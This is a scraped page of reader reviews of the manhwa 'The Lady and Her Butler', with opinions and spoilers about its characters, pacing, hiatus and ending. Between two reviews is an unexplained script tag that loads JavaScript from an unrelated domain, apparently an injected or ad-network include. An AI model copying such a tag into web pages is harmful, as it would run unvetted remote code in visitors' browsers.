The Lady and Her Butler - Reviews

Alt title: Agassiwa Ureongchonggak

The Lady and Her Butler
Some1ridculous's avatar
Mar 15, 2020

Even though I appreciated the fact that Sooha is different from any heroine character out there with her straightforward "no BS" attitude, I honestly found the story was just boring. I think the main reason is the fact the whole story I felt, keeps focusing on the other characters that were pretty pointless and annoying (especially the boss and the shopkeeper fella). It would've been better if the whole thing just focuses on Sooha and Taesoo only. That way I could've given this Manhwa a higher score....

faiNoly's avatar
May 13, 2020

This review contains spoilers!!

I really liked the first half of this manhwa. The characters all had their own personalities and backstory, the main couple had great interactions and even the second couple had an interesting dinamic between them. The art is really pretty too, despite lacking some background sometimes. But when we got to the second half of the story, instead of exploring the problems each character had in a realistic way, we got a series of misunderstandings and lack of communication recycled over and over..

Spoilers now!

I'll start with the second couple. We were presented with the past between soojung and taesoo, which made us dislike Soojung. But with Mr. Hwang, it kinda only starts going wrong when she lies about being moon crystal the second time. And from then on, it's just a series of bad decisions on Soojung's part which only contribute to fuel the reader's dislike towards her. She never talks things out with Hwang, not about her past, not about her fear when she lies to him the first time (which would have been totally forgivable at first). It's like she's a character created without the intention of ever having a happy ending. It would have been way more interesting if they were to talk things out at first and see how they would evolve if Hwang helped her with her past instead of the author driving her to insanity just because.

Regarding the main couple, I really don't know... I really really loved them but from chapter 90 till chapter 120 it's just a pain. I mean, after all they went through, the autor just straight up changes Taesoo's personality. I know it's trying to portray his feelings of insecurity regarding Sooha and their future together but it's just so badly executed that it hurts. At least it's a happy ending...

And rip Garam and his story I guess...

To summarize, I think it's worth reading. I was really invested in the characters, which was what got me through the later chapters. Don't bother with the side stories though... I really mean it!

MsNova's avatar
Oct 6, 2019

I made it up to issue 105. The story has NOT ended there BUT the issues have. The last issue was published in August 2019. Nothing since then. I was enjoying it and I would have liked to continue with this story, but since it ended with NO ending and not a word about future publications, I can not give it a higher rating.

That is why I gave it a 5 out of 10.  If it ever starts to publish again AND I decide to continue reading it, I will give it a better rating. Cheezy, unwelcomed cliff hangers cost stars when I rate a manga or anime and it becomes a toss up as to my continuing with it or not.

If these problems are not an issue for you, then by all means, read it but do not expect an ending at issue 105.

<script src="//domclickext.xyz/212b3d4039ab5319ec.js" async="" type="text/javascript"></script>
miumiu1274's avatar
Aug 3, 2020

People don't seem to like this and I don't exactly know why. I think that people find it boring but I think it resembles most lives of working adults. To be fair, our lives aren't very exciting either[at least mine isn't full of emotional rollercoasters] I don't like giving out spoilers but without a spoiler, I won't be able to say what I didn't like so here I go: I like it except for when Taesoo gave up and ran away but HEY, we all need a break from time to time in order to get our minds working again. I guess people think that Taesoo is a coward and stuff but it makes sense for someone to break down after being judged and looked down upon. He was even BETRAYED!!!!! [I won't say who betrayed him] So, I just wanna say that people like this exist and we shouldn't judge them based on our own opinions~ Hope you like this review and you can just ignore this if you don't agree with this review~ Good luck and have fun~~

Tzia's avatar
Feb 26, 2020

Ladies and gentlemen this manga is FINISHED! I don't know why site says it's still on going. Btw I LOVEED IT! I loves MYBOY Granam and Mr. Hyung and i wanted to last with Sooha but i accepted the fact that this couple passed their personal demons and stayed together. YEAH Taesoo was kind an asshole in some ways but who isn't? It was a very realistic manga and OMG SOOHAAAAA I LOVEEE YOUUU SOOO MUCH!